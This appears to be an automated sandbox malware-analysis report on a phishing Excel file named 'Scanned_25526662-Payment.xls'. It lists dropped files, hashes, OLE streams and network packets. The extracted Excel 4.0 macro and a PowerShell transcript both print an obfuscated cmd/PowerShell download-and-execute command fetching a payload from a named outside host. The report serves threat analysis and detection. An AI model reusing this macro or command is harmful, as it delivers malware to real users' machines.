                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3072
                                                                                                                                                      Entropy (8bit):2.709829994885581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:etGSI/Bepsl/d8d7itoztltkZfIZ1QoHUxbI+ycuZhNUvfakSHvYPNnq:63yuMtoxQJIlHKb1ul0a3Yq
                                                                                                                                                      MD5:EE1AC02E0555F66ACE02D9BC41202DEE
                                                                                                                                                      SHA1:90EABB4D7D17554E10F963804E362A1D5F810F8D
                                                                                                                                                      SHA-256:70942BF7DE993FFEF8AA3A32323C7CF3055BB7D7ADAC7C4436D55887EDDC10E4
                                                                                                                                                      SHA-512:B3BAABDB9A3F6A79C50352CCA26461BDFE59B094EAA6EFE5B4417C2B95D2E0E5FA34809A4FA6882543861C7AE6E3678F8C552D262D7D34A41432A6A90EE6C79B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!................~#... ...@....... ....................................@.................................$#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l.......#~..p.......#Strings....l.......#US.t.......#GUID.......H...#Blob...........G.........%3............................................................2.+...w.W.....W.......................................... 9.....P ......D.........J.....Q...D.....D...!.D.....D.............'.......9......................................."........<Module>.nwaha3c5.dll.Win.nATIve.mscorlib.System.Object.ShowWindow..ctor.handle.state.System.Runtime.CompilerSe
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.out
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):412
                                                                                                                                                      Entropy (8bit):4.871364761010112
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Jan 8 16:39:56 2021, atime=Fri Jan 8 16:39:56 2021, length=8192, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.668183062655162
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8YmiW4CXUAuElPCH2YgZFYC0nl+WrjAZ/2bDyLC5Lu4t2Y+xIBjKZm:8Ye4jgZ2zAZiDb87aB6m
                                                                                                                                                      MD5:05930875E1214990952104359F32266D
                                                                                                                                                      SHA1:EA0127B857448AF602FB50D19A704A93D7B7AF63
                                                                                                                                                      SHA-256:AD16089895ED495200F5E013CA60829DC3BF85D43B8051A7F714EF5EFA56EC65
                                                                                                                                                      SHA-512:DDDD3B0DF60B509F790A986D54F66F936EE3A9C49CFA7AF16707370F7AA701525835B9898F32FCB49F8FA5EE682991B14A818D1F3F5FA6659A3FD12FFC9F6A03
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: L..................F........N....-.....G....).G..... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..(R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.(R.......S.......................h.a.r.d.z.....~.1.....(R....Desktop.h.......Ny.(R.......Y..............>.....Oo..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......648351...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Scanned_25526662-Payment.xls.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:45 2020, mtime=Fri Jan 8 16:39:56 2021, atime=Fri Jan 8 16:39:56 2021, length=130560, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2250
                                                                                                                                                      Entropy (8bit):4.701797705276847
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:8mRh/vcdwEZxM9B6pmRh/vcdwEZxM9B6:82/U7ZxM9K2/U7ZxM9
                                                                                                                                                      MD5:07DAAB2C3AB4CA9099FF8F299D5E2CB7
                                                                                                                                                      SHA1:73B959E6E946E6D76240D6B543BEF59D1DC0C59B
                                                                                                                                                      SHA-256:F6F4E4481CC5E08BD9FBF738CA716467B01C4BC253EAFD467E7AA52F04469566
                                                                                                                                                      SHA-512:9BDADA3277A9ED00C5A23E779E038BECDE490554EE443D7DD9BD10CCADED750B5252BCAF0C818C73581A1556B53C04F0FE93B15D9363F44186DCC8D0CA12F725
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: L..................F.... ...m.|.:...).G....).G.................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..(R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.(R.......S.......................h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny.(R.......Y..............>.......4.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....(R.. .SCANNE~1.XLS..j......>Qwx(R......h.......................X.S.c.a.n.n.e.d._.2.5.5.2.6.6.6.2.-.P.a.y.m.e.n.t...x.l.s.......b...............-.......a...........>.S......C:\Users\user\Desktop\Scanned_25526662-Payment.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.c.a.n.n.e.d._.2.5.5.2.6.6.6.2.-.P.a.y.m.e.n.t...x.l.s.........:..,.LB.)...As...`.......X.......648351...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):180
                                                                                                                                                      Entropy (8bit):4.777475947375911
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:zQtfUDEY5iyBVomMQtfUDEYuNfUDEYmMQtfUDEYv:zQtfUgiiyj6QtfUgffUgKQtfUgC
                                                                                                                                                      MD5:454B08023C04D3D51E0919A5D30DA746
                                                                                                                                                      SHA1:3336E8A93B0E884C45B296387403119179914226
                                                                                                                                                      SHA-256:DE4EB7D21A212470F415C1FB45320ABABA55E34DFB9F07688A4A02A60AE83127
                                                                                                                                                      SHA-512:396A1DF4508194B3CBDE3D17EB9FD87B15F41540C6CE7B234920959F9F87374205ADA300E1F29C17020891AE1547916FAACBD7C05115216FD5A06DA192991B6E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: [xls]..Scanned_25526662-Payment.xls.LNK=0..Desktop.LNK=0..[xls]..Scanned_25526662-Payment.xls.LNK=0..Scanned_25526662-Payment.xls.LNK=0..[xls]..Scanned_25526662-Payment.xls.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\1BA10000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):138781
                                                                                                                                                      Entropy (8bit):7.488943905849951
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:b4xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAkHwSJtUkUlR/FoeHxv7nalHDCfZoCFg:ExEtjPOtioVjDGUU1qfDlavx+W2QnA8V
                                                                                                                                                      MD5:F469584A496D5D74D979C15062D580AC
                                                                                                                                                      SHA1:F6403FB404A3FDD9EA3E0367D3727DA89F9A25FE
                                                                                                                                                      SHA-256:2E2ABE8548C697A7BBDDDFF2BB418B525697CA389CB7CBA7778923933CD2B11C
                                                                                                                                                      SHA-512:AF28B72F53DB255C5D151D7727310591F0ADAF3047A8AB3BB87803762BF9BEB6ED8143DA520B56E8EC22F9C5F085F297E15A7AA39E08FBE68D16B3702AEDEDB3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\Desktop\1BA10000, Author: Florian Roth
                                                                                                                                                      Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....<.WN..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.........."$"
                                                                                                                                                      C:\Users\user\Documents\20210108\PowerShell_transcript.648351.+jaH7BR7.20210108094000.txt
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1281
                                                                                                                                                      Entropy (8bit):5.311363078079541
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:BxSARxvBnFx2DOXNl/jRW3HjeTKKjX4CIym1ZJXr91/jRVuKs8MXiV+PzgBtoBng:BZzvhFoOo3qDYB1ZHVZW2+rg2ZZE
                                                                                                                                                      MD5:D1CE0F106AF1204373AC13154D9B14EA
                                                                                                                                                      SHA1:4CB49D8EAB791DB13768114C75CD8E8057E5D531
                                                                                                                                                      SHA-256:C9BB7F2DC406C7994C987045761ADB7FF1E7D249E25DFA242AE26056E819A66D
                                                                                                                                                      SHA-512:C17A77B0E81F5AD9398175EA621E3BF0640B9C46A4A97BDA73B7F8F340C882DAD80BE38CA884E1C25104541C4D14B00E4C0C664DB0E6A9E139EC64DE45B06259
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210108094013..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))..Process ID: 6940..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210108094013..**********************..PS>IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))..False..C:\Users\user\AppData\Local\Temp\Test1.txt..C:\Users\user\AppData\Local\Temp\Test2.gif.. 1 file(s) copied...Executing (Win32_Process)->Create()..Method execution successful...Out Parameters:..instance of __PARA
                                                                                                                                                      \Device\ConDrv
                                                                                                                                                      Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):160
                                                                                                                                                      Entropy (8bit):5.095703110114614
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgmmdeodJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egmmdNeF
                                                                                                                                                      MD5:1FDB56CE978F6A325955128E1C40D443
                                                                                                                                                      SHA1:1DEB1C5C447EFFF138618EBE82FBF5808510D6E6
                                                                                                                                                      SHA-256:6182F69DFA4C4EDE52B912E7CC0AD4A0DC54D88D1FC077C2EB48BE81712E2DB2
                                                                                                                                                      SHA-512:5B9C620C94022F245D06DE3372832FE0046324F0E1E34647049FEAD3C4B9CA38FFBFA441BA09C9E537BD6E1F725C965B99E39089AB038E6CD8372E48525DD6A4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 4928;...ReturnValue = 0;..};....

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: OBA, Last Saved By: OBA, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 6 16:47:21 2021, Last Saved Time/Date: Wed Jan 6 16:49:04 2021, Security: 0
                                                                                                                                                      Entropy (8bit):7.633929977062203
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel sheet (30009/1) 45.83%
                                                                                                                                                      • Microsoft Works Spreadsheet (27457/6) 41.94%
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.23%
                                                                                                                                                      File name:Scanned_25526662-Payment.xls
                                                                                                                                                      File size:123904
                                                                                                                                                      MD5:cd7d4543958945e3fab4f0631e3494f3
                                                                                                                                                      SHA1:3e00f26ab9384c9c1bb24eeb2de331f751f536ed
                                                                                                                                                      SHA256:b7a919bb30c1633483399356aedf42c11656c8a076be969e85b57ccdd071b879
                                                                                                                                                      SHA512:72fa901dd83e7b1c4cae3a04221a90d3ddb3b33bc17e7117c60109d7de50a1f68013365062d445d6774ef9a2d584966d5b22724ead59a6850875857d83c341c4
                                                                                                                                                      SSDEEP:3072:ffZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAQHgSJtMrslx/FQeHxvjnqlHDCfVoCF:3Z+RwPONXoRjDhIcp0fDlavx+W26nAIn
                                                                                                                                                      File Content Preview:........................>.......................................................b..............................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "Scanned_25526662-Payment.xls"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:True
                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Code Page:1252
                                                                                                                                                      Author:OBA
                                                                                                                                                      Last Saved By:OBA
                                                                                                                                                      Create Time:2021-01-06 16:47:21
                                                                                                                                                      Last Saved Time:2021-01-06 16:49:04
                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Document Code Page:1252
                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                      Contains Dirty Links:False
                                                                                                                                                      Shared Document:False
                                                                                                                                                      Changed Hyperlinks:False
                                                                                                                                                      Application Version:786432

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x1CompObj
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:114
                                                                                                                                                      Entropy:4.25248375193
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 288
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:288
                                                                                                                                                      Entropy:3.22237115402
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:200
                                                                                                                                                      Entropy:3.42401113166
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O B A . . . . . . . . . O B A . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . K . . . @ . . . . . O . K . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 119481
                                                                                                                                                      General
                                                                                                                                                      Stream Path:Workbook
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Stream Size:119481
                                                                                                                                                      Entropy:7.73465408824
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . O B A B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . < . W N . . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 4f 42 41 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      "=                                                                        SDs95LPpzopuDcZDU8hUBnJdjpz3DTM   &                      xvpj1SYG7ygbfNzTQgb1pl             &         h4m6iHDrpuC8foIZBCpyw51u0YeZhrROFu8QefOhN            &           n0uXY119a7UTzjVjbzaSc              &                  jeRiWEh13A2xyNeQioR3x                        &                         TXdUbbRAIaBGmbaYT    &              WGkwsmF2sb7S7H9AgMcj3ZTC56Xjh1T6                    &                              mHxeebWDqG799FwPoNJfDQzOVRnYM8LXOG4R2nO3Gpi                       &             LNomLC1O     &                       iEi0eXp8sAGCLXevNQ7                   &           ppWJ1V7MBOumusr6mgFOCISN0FhM9mji     &          h7SaY8nqb57oK4XDdUUaFgoVIKa                               &        IbtiRrV0IbO3HYPjYeSwMAvYq5CErl3N           & zKVi3cfeEtCEeHLkwmNalEynPuAM                &         PyLprObWf2kwfAb2zu2QEk0XSRIWGspOyGY   &            ZJO5o4Ziyq &         Lr6av3LLfdRIdHyxVZgTvZ                             &                   UWH8HACiUjgg                                & RrHvX68ZqcUCJnDrw5ryT7khTnvgMvL6nm3b4ZCKtSr3Yw3k                 &                mMuy3ChhR4AjwIWFtkiqMkrVu6        &                          ldGDtSSMb8Lla&EXEC(((((((((((""cmd.eXE  /c PoWErsHEll  -ex ByPASs -nop -w 1 IeX( cUrl  ('http://lankarecipes.com/Sparc.jp'  + 'g' ))"")))))))))))"=                            RETURN()

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jan 8, 2021 09:40:24.890063047 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.076226950 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.076709032 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.081321955 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.264159918 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271898031 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271929979 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271949053 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271960974 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271974087 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271996975 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.272013903 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.272028923 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.272047997 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.272066116 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.272118092 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.272195101 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.454987049 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455025911 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455038071 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455058098 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455075026 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455090046 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455106020 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455122948 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455141068 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455161095 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455163002 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455177069 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455195904 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455214024 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455229044 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455233097 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455245018 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455260992 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455264091 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455276012 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455291986 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455297947 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455307961 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455327034 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455327988 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455383062 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640362978 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640396118 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640413046 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640428066 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640446901 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640455961 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640477896 CET8049731192.185.236.165192.168.2.3
